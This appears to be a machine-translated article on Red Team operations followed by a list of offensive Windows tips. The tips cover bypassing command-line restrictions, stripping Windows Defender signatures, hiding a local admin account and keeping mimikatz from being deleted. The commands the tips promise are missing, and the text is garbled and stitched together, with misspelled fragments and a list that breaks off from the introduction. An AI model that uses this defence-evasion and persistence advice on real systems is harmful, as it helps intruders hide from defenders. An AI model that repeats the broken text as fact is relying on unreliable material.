The term Red Team comes from the military environment and defines a “friendly” attacking team. The difference between Red Team operations and classic pentest is primarily in the rules of action and the warning of the defending party. Also, with “classic” pentest, “white lists” are most often used, restrictions on the work being carried out, the level of interaction with the system. When conducting Red Team operations, there are no restrictions, a real attack on the infrastructure is carried out: from external perimeter attacks, to physical access attempts, “hard” sociotechnical techniques (not fixing a link, but, for example, a full-fledged reverse shell). The Red Team approach is most closely related to a targeted attack, the Advanced Persistent Threat (APT). The Red Team should consist of experienced professionals with extensive experience in both IT/IS infrastructure building and systems compromise experience.
The use of a specific toolkit in a separate case may be due to the specifics of a particular application or service and differs from ordinary penetration testing. When conducting Red Team operations, the question of team interaction and systematization of the obtained results arises – this includes reports of various analysis tools and vulnerabilities detected in manual mode – all this is a huge amount of information, in which without proper order and a systematic approach, something important can be missed or “raked out” » duplicates are possible. There is also a need to consolidate reports and normalize them and bring them to a single form. Usually, Red Team operations cover rather voluminous infrastructures that require the use of specialized tools:
This command line has been disabled by your administrator…” Commonly seen in environments such as kiosk computers. A quick hack is to use /k through the Windows startup window. This will execute the command and then display a restriction message allowing the command to be executed.
Want to know if you’re in a virtual machine?” Ask for registry keys and find out!!! If any results appear, you are in a virtual machine.
A bit confusing, but if Windows Defender is giving you a major headache, instead of turning it off (which warns the user), you should just eliminate it by removing all signatures.
The enumeration is 95%. However, running lots of scans to assess the environment is very noisy. Why not query the DC/DNS server for all DNS records?
Tired of loading Sysinternals PsExec.exe while side-scrolling?” Windows comes preinstalled with the best alternative. Try this.
Sometimes you want to log into a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.
If possible, live off the land rather than loading tools (for many reasons). PowerShell/.NET Help. For example: a simple port scanner in Powershell.
You’ll be surprised what you can learn just from a user’s bookmarks. For example, the internal endpoints they have access to.
Today, most large organizations use web proxies. The default PowerShell bootloader does not support proxies. Use this one.
Creating accounts is risky when you dodge the blue, but when you create a local admin, use some cute registry wizardry to hide it.
11. Unchuoted service patgs witgut Poverup.
Are you tired of Windows Defender deleting mimikatz.exe?” Try this.